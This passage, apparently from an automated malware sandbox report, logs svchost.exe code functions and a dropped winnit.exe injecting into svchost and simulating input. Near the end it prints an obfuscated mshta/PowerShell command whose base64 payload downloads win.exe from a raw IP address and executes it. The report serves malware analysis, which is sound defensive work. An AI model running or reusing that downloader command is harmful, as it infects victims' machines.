Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB4000 mov ecx, dword ptr fs:[00000030h]	7_2_03BB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h]	7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B41070 mov ecx, dword ptr fs:[00000030h]	7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h]	7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h]	7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h]	7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h]	7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h]	7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h]	7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h]	7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h]	7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h]	7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h]	7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h]	7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5C073 mov eax, dword ptr fs:[00000030h]	7_2_03B5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BAD070 mov ecx, dword ptr fs:[00000030h]	7_2_03BAD070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB106E mov eax, dword ptr fs:[00000030h]	7_2_03BB106E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B32050 mov eax, dword ptr fs:[00000030h]	7_2_03B32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BD705E mov ebx, dword ptr fs:[00000030h]	7_2_03BD705E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BD705E mov eax, dword ptr fs:[00000030h]	7_2_03BD705E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5B052 mov eax, dword ptr fs:[00000030h]	7_2_03B5B052
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB6050 mov eax, dword ptr fs:[00000030h]	7_2_03BB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5D7B0 mov eax, dword ptr fs:[00000030h]	7_2_03B5D7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB97A9 mov eax, dword ptr fs:[00000030h]	7_2_03BB97A9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BBF7AF mov eax, dword ptr fs:[00000030h]	7_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BBF7AF mov eax, dword ptr fs:[00000030h]	7_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BBF7AF mov eax, dword ptr fs:[00000030h]	7_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BBF7AF mov eax, dword ptr fs:[00000030h]	7_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BBF7AF mov eax, dword ptr fs:[00000030h]	7_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B307AF mov eax, dword ptr fs:[00000030h]	7_2_03B307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BEF78A mov eax, dword ptr fs:[00000030h]	7_2_03BEF78A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B347FB mov eax, dword ptr fs:[00000030h]	7_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B347FB mov eax, dword ptr fs:[00000030h]	7_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3D7E0 mov ecx, dword ptr fs:[00000030h]	7_2_03B3D7E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B527ED mov eax, dword ptr fs:[00000030h]	7_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B527ED mov eax, dword ptr fs:[00000030h]	7_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B527ED mov eax, dword ptr fs:[00000030h]	7_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]	7_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B357C0 mov eax, dword ptr fs:[00000030h]	7_2_03B357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B357C0 mov eax, dword ptr fs:[00000030h]	7_2_03B357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B357C0 mov eax, dword ptr fs:[00000030h]	7_2_03B357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C037B6 mov eax, dword ptr fs:[00000030h]	7_2_03C037B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB07C3 mov eax, dword ptr fs:[00000030h]	7_2_03BB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B29730 mov eax, dword ptr fs:[00000030h]	7_2_03B29730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B29730 mov eax, dword ptr fs:[00000030h]	7_2_03B29730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B65734 mov eax, dword ptr fs:[00000030h]	7_2_03B65734
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3973A mov eax, dword ptr fs:[00000030h]	7_2_03B3973A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3973A mov eax, dword ptr fs:[00000030h]	7_2_03B3973A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C03749 mov eax, dword ptr fs:[00000030h]	7_2_03C03749
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6273C mov eax, dword ptr fs:[00000030h]	7_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6273C mov ecx, dword ptr fs:[00000030h]	7_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6273C mov eax, dword ptr fs:[00000030h]	7_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BAC730 mov eax, dword ptr fs:[00000030h]	7_2_03BAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BEF72E mov eax, dword ptr fs:[00000030h]	7_2_03BEF72E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B33720 mov eax, dword ptr fs:[00000030h]	7_2_03B33720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4F720 mov eax, dword ptr fs:[00000030h]	7_2_03B4F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4F720 mov eax, dword ptr fs:[00000030h]	7_2_03B4F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4F720 mov eax, dword ptr fs:[00000030h]	7_2_03B4F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF972B mov eax, dword ptr fs:[00000030h]	7_2_03BF972B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6C720 mov eax, dword ptr fs:[00000030h]	7_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6C720 mov eax, dword ptr fs:[00000030h]	7_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B30710 mov eax, dword ptr fs:[00000030h]	7_2_03B30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B60710 mov eax, dword ptr fs:[00000030h]	7_2_03B60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6F71F mov eax, dword ptr fs:[00000030h]	7_2_03B6F71F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6F71F mov eax, dword ptr fs:[00000030h]	7_2_03B6F71F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B37703 mov eax, dword ptr fs:[00000030h]	7_2_03B37703
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B35702 mov eax, dword ptr fs:[00000030h]	7_2_03B35702
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B35702 mov eax, dword ptr fs:[00000030h]	7_2_03B35702
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6C700 mov eax, dword ptr fs:[00000030h]	7_2_03B6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B38770 mov eax, dword ptr fs:[00000030h]	7_2_03B38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h]	7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h]	7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h]	7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h]	7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h]	7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h]	7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h]	7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h]	7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h]	7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h]	7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h]	7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h]	7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2B765 mov eax, dword ptr fs:[00000030h]	7_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2B765 mov eax, dword ptr fs:[00000030h]	7_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2B765 mov eax, dword ptr fs:[00000030h]	7_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2B765 mov eax, dword ptr fs:[00000030h]	7_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B30750 mov eax, dword ptr fs:[00000030h]	7_2_03B30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72750 mov eax, dword ptr fs:[00000030h]	7_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72750 mov eax, dword ptr fs:[00000030h]	7_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB4755 mov eax, dword ptr fs:[00000030h]	7_2_03BB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B43740 mov eax, dword ptr fs:[00000030h]	7_2_03B43740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B43740 mov eax, dword ptr fs:[00000030h]	7_2_03B43740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B43740 mov eax, dword ptr fs:[00000030h]	7_2_03B43740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6674D mov esi, dword ptr fs:[00000030h]	7_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6674D mov eax, dword ptr fs:[00000030h]	7_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6674D mov eax, dword ptr fs:[00000030h]	7_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C0B73C mov eax, dword ptr fs:[00000030h]	7_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C0B73C mov eax, dword ptr fs:[00000030h]	7_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C0B73C mov eax, dword ptr fs:[00000030h]	7_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C0B73C mov eax, dword ptr fs:[00000030h]	7_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B276B2 mov eax, dword ptr fs:[00000030h]	7_2_03B276B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B276B2 mov eax, dword ptr fs:[00000030h]	7_2_03B276B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B276B2 mov eax, dword ptr fs:[00000030h]	7_2_03B276B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B666B0 mov eax, dword ptr fs:[00000030h]	7_2_03B666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]	7_2_03B6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2D6AA mov eax, dword ptr fs:[00000030h]	7_2_03B2D6AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2D6AA mov eax, dword ptr fs:[00000030h]	7_2_03B2D6AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B34690 mov eax, dword ptr fs:[00000030h]	7_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B34690 mov eax, dword ptr fs:[00000030h]	7_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB368C mov eax, dword ptr fs:[00000030h]	7_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB368C mov eax, dword ptr fs:[00000030h]	7_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB368C mov eax, dword ptr fs:[00000030h]	7_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB368C mov eax, dword ptr fs:[00000030h]	7_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	7_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	7_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	7_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	7_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB06F1 mov eax, dword ptr fs:[00000030h]	7_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB06F1 mov eax, dword ptr fs:[00000030h]	7_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BED6F0 mov eax, dword ptr fs:[00000030h]	7_2_03BED6F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h]	7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h]	7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h]	7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h]	7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h]	7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h]	7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5D6E0 mov eax, dword ptr fs:[00000030h]	7_2_03B5D6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5D6E0 mov eax, dword ptr fs:[00000030h]	7_2_03B5D6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B636EF mov eax, dword ptr fs:[00000030h]	7_2_03B636EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]	7_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]	7_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF16CC mov eax, dword ptr fs:[00000030h]	7_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF16CC mov eax, dword ptr fs:[00000030h]	7_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF16CC mov eax, dword ptr fs:[00000030h]	7_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF16CC mov eax, dword ptr fs:[00000030h]	7_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BEF6C7 mov eax, dword ptr fs:[00000030h]	7_2_03BEF6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B616CF mov eax, dword ptr fs:[00000030h]	7_2_03B616CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4E627 mov eax, dword ptr fs:[00000030h]	7_2_03B4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h]	7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h]	7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h]	7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h]	7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h]	7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h]	7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h]	7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h]	7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h]	7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B66620 mov eax, dword ptr fs:[00000030h]	7_2_03B66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B68620 mov eax, dword ptr fs:[00000030h]	7_2_03B68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3262C mov eax, dword ptr fs:[00000030h]	7_2_03B3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B33616 mov eax, dword ptr fs:[00000030h]	7_2_03B33616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B33616 mov eax, dword ptr fs:[00000030h]	7_2_03B33616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B72619 mov eax, dword ptr fs:[00000030h]	7_2_03B72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B61607 mov eax, dword ptr fs:[00000030h]	7_2_03B61607
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BAE609 mov eax, dword ptr fs:[00000030h]	7_2_03BAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6F603 mov eax, dword ptr fs:[00000030h]	7_2_03B6F603
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4260B mov eax, dword ptr fs:[00000030h]	7_2_03B4260B

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B080A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

6_2_00B080A9

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00ADA124 SetUnhandledExceptionFilter,		6_2_00ADA124
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00ADA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		6_2_00ADA155

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\winnit.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\winnit.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 3089008

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B087B1 LogonUserW,

6_2_00B087B1

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00AB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

6_2_00AB3B3A

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00AB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

6_2_00AB48D7

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B14C27 mouse_event,

6_2_00B14C27

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; 